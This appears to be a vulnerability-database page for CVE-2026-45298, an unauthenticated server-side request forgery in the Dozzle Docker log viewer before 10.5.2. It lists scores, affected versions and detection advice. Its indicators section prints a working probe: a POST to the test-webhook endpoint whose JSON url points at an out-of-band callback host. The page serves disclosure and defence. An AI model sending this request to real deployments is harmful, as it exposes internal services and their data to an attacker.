cbcvebase.
CVE-2026-45298
published 2026-05-26

CVE-2026-45298: Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, in a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set)…

PriorityP265high8.6CVSS 3.1
AVNACLPRNUINSCCHINAN
EXPLOIT
EPSS
1.49%
70.9th percentile
Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, in a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set), POST /api/notifications/test-webhook is reachable without authentication and forwards an attacker-controlled URL into a WebhookDispatcher that sends an HTTP POST to the supplied URL with attacker-controlled request headers, and returns the response status code AND up to 1MB of the response body to the caller, when the target replies non-2xx. This vulnerability is fixed in 10.5.2.

Affected

3 ranges
VendorProductVersion rangeFixed in
amir20dozzle< 10.5.210.5.2
amirraminfardozzle< 10.5.210.5.2
github.comamir20_dozzle0 – 8.14.12

Detection & IOCsextracted from sources · hover to see the quote

urlPOST /api/notifications/test-webhook
commandPOST /api/notifications/test-webhook HTTP/1.1 Content-Type: application/json {"url":"http://{{interactsh-url}}","headers":{}}
  • The vulnerable endpoint POST /api/notifications/test-webhook is unauthenticated in default Dozzle deployments (no DOZZLE_AUTH_PROVIDER set). Monitor for unexpected POST requests to this path from external/untrusted sources.
  • The SSRF payload is delivered as a JSON body with a 'url' key and optional 'headers' key. Inspect POST bodies to /api/notifications/test-webhook for attacker-controlled URLs pointing to internal resources or out-of-band callback hosts.
  • On non-2xx responses from the target, the server returns up to 1MB of the response body to the caller — monitor for large response bodies from this endpoint as a sign of active SSRF data exfiltration.
  • Nuclei template matches on HTTP interaction protocol hit on interactsh and response body containing '"statusCode":200' with HTTP 200 status — use these as detection signals in proxy/WAF logs.
  • ·The vulnerability only affects default Dozzle deployments where DOZZLE_AUTH_PROVIDER is not configured. Deployments with an auth provider set may not expose the endpoint unauthenticated.
  • ·The fix is present in Dozzle version 10.5.2 and later. Versions prior to 10.5.2 are affected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.